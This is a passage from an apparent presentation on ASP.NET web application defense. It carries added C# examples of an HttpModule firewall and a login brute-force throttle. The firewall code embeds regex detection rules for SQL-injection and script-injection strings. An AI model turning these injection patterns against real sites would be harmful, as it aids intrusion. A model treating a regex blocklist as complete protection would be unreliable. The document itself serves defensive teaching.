                }
            }
        }
    }   // end of ProcessRequest

    // IHttpModule also requires Dispose(); nothing to release here
    public void Dispose() { }
    }   // end of class webfirewall
    }   // end of namespace webfirewall
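The fragments on the preceding slides assembled into one working module, as an added example (not the presentation's code): the rules are a constructed inline sample in the slides' <QUERY>/<POST> ini format, the query string and body are URL-decoded before matching so "%27" and "'" are treated alike, and a hit is refused with a 403 and CompleteRequest() rather than Response.End(). The names WebFirewallModule, LoadRules, IsMalicious and SampleRules are mine.

```csharp
using System;
using System.IO;
using System.Text.RegularExpressions;
using System.Web;

public class WebFirewallModule : IHttpModule
{
    // Constructed sample rules in the slides' ini format; a deployment would read them from a
    // file resolved against HttpRuntime.AppDomainAppPath (the web root), not Environment.CurrentDirectory.
    public const string SampleRules =
        "<QUERY>'\\s*(or|and)\\s+</QUERY>\n<QUERY><\\s*script</QUERY>\n" +
        "<POST>'\\s*(or|and)\\s+</POST>\n<POST>union\\s+select</POST>\n";
    Regex[] queryRules, postRules;

    // Extracts every pattern between <tag>...</tag> and compiles it once at start-up.
    public static Regex[] LoadRules(string ini, string tag)
    {
        MatchCollection mc = Regex.Matches(ini, "<" + tag + ">(.*?)</" + tag + ">");
        Regex[] rules = new Regex[mc.Count];
        for (int i = 0; i < mc.Count; i++)
            rules[i] = new Regex(mc[i].Groups[1].Value, RegexOptions.IgnoreCase | RegexOptions.Compiled);
        return rules;
    }

    // URL-decodes first so encoded and plain forms are inspected alike; true when any rule hits.
    public static bool IsMalicious(string input, Regex[] rules)
    {
        string decoded = HttpUtility.UrlDecode(input ?? "");
        foreach (Regex r in rules) if (r.IsMatch(decoded)) return true;
        return false;
    }

    public void Init(HttpApplication app)
    {
        queryRules = LoadRules(SampleRules, "QUERY");
        postRules = LoadRules(SampleRules, "POST");
        app.BeginRequest += OnBeginRequest;   // inspect every request before the handler runs
    }

    void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        string body = "";
        if (app.Request.HttpMethod == "POST")
        {
            // Read the raw body, then rewind so the page handler still sees the form fields
            body = new StreamReader(app.Request.InputStream).ReadToEnd();
            app.Request.InputStream.Position = 0;
        }
        if (!IsMalicious(app.Request.Url.Query, queryRules) && !IsMalicious(body, postRules)) return;
        app.Response.StatusCode = 403;
        app.Response.Write("Security Error");
        app.CompleteRequest();   // ends the pipeline without the ThreadAbortException Response.End() throws
    }

    public void Dispose() { }
}
```

Register it in web.config under <httpModules> exactly as the deployment slide shows, using this class name and your assembly name in the type attribute.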
• Deploying web application firewall
  • Put the dll in the /bin folder.
  • Add the following lines to your web.config file.
  • The web application firewall gets loaded.

    <httpModules>
      <add type="firewall.WebAppWall, WebAppMod" name="WebAppWall" />
    </httpModules>
• Impact of web application wall
  [Screenshots: Before / After]
• Defense strategies
  • All security attributes can be guarded by the firewall.
  • We can log or provide IDS using the same module.
  • Some of the deployment parameters can be implemented using this method.
  • IHttpHandler can be developed in a similar way.
• Session management
  • The Session object can be used in the HTTP pipeline and sessions can be strengthened.
  • Session hijacking is a common and critical security problem.
  • IHttpHandler or Module can be used to provide a solid defense against it.
• Application Bruteforcing
  • Applications have forms through which the username and password are sent using POST.
  • Application bruteforcing is a common attack type.
  • HttpModule can capture these attacks, and on a count basis the attack can be avoided.
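One way to implement the count-based defense described above, as an added example (not the presentation's code): a module that counts POSTs to the login form per client address inside a sliding window and refuses further attempts once a limit is exceeded. The login path, the limit of 5 attempts per 10 minutes, and the names AttemptCounter and LoginThrottleModule are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Web;

// Tracks attempts per key (here: client address + login path) inside a sliding time window.
public class AttemptCounter
{
    readonly int limit; readonly TimeSpan window;
    readonly Dictionary<string, Queue<DateTime>> hits = new Dictionary<string, Queue<DateTime>>();
    readonly object gate = new object();   // the module is called from many worker threads

    public AttemptCounter(int limit, TimeSpan window) { this.limit = limit; this.window = window; }

    // Records one attempt at time 'now' and returns true once the key has exceeded the limit.
    public bool RecordAndCheck(string key, DateTime now)
    {
        lock (gate)
        {
            Queue<DateTime> q;
            if (!hits.TryGetValue(key, out q)) hits[key] = q = new Queue<DateTime>();
            while (q.Count > 0 && now - q.Peek() > window) q.Dequeue();   // forget attempts outside the window
            q.Enqueue(now);
            return q.Count > limit;
        }
    }
}

public class LoginThrottleModule : IHttpModule
{
    // Assumed login page and policy: more than 5 POSTs from one address within 10 minutes is blocked.
    const string LoginPath = "/login.aspx";
    static readonly AttemptCounter Counter = new AttemptCounter(5, TimeSpan.FromMinutes(10));

    public void Init(HttpApplication app) { app.BeginRequest += OnBeginRequest; }

    void OnBeginRequest(object sender, EventArgs e)
    {
        HttpApplication app = (HttpApplication)sender;
        HttpRequest req = app.Request;
        if (req.HttpMethod != "POST" || !req.Path.Equals(LoginPath, StringComparison.OrdinalIgnoreCase)) return;
        // UserHostAddress is the TCP peer; behind a reverse proxy it would be the proxy, not the client
        string key = req.UserHostAddress + "|" + LoginPath;
        if (!Counter.RecordAndCheck(key, DateTime.UtcNow)) return;
        // Log for IDS purposes, then refuse the request without running the login handler
        System.Diagnostics.Trace.TraceWarning("Login rate limit exceeded for {0}", req.UserHostAddress);
        app.Response.StatusCode = 429;
        app.Response.Write("Too many login attempts");
        app.CompleteRequest();
    }

    public void Dispose() { }
}
```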
• Automated attacks
  • Automated web application attack tools are out there.
  • They crawl the site and then launch attacks. This can be avoided by setting "honey traps" using HttpModule.
  • Once trapped, the attacker can be put into an infinite loop using this defense trick.
• Browser catching
  • Detecting the browser using HttpModule.
  • Making sure the request is coming from a browser by means of JavaScript processing and cookie handling.
  • Interesting trick.
• Papers
  Assessing Web App Security with Mozilla
  http://www.oreillynet.com/pub/a/security/2005/10/20/web_vulnerabilities.html

  Securing Web Services with mod_security
  http://www.oreillynet.com/pub/a/onlamp/2005/06/09/wss_security.html

  Web Services – Attacks and Defense
  http://www.infosecwriters.com/texts.php?op=display&id=235

  Web Application Footprints and Discovery
  http://www.infosecwriters.com/texts.php?op=display&id=259

  Web application defense at the gates – Leveraging IHttpModule
  http://www.infosecwriters.com/texts.php?op=display&id=276

  Web Services: Enumeration and Profiling
  http://www.infosecwriters.com/texts.php?op=display&id=278

  Domain Footprinting for Web Applications and Web Services
  http://www.infosecwriters.com/texts.php?op=display&id=292

  Browser Identification for Web Applications
  http://www.infosecwriters.com/texts.php?op=display&id=297

  Microsoft ASP.NET Web Services & Secure coding
  Unhandled exception leads to file system disclosure and SQL injection.
  http://net-square.com/advisory/NS-051805-ASPNET.pdf
• Thanks!
  shreeraj@net-square.com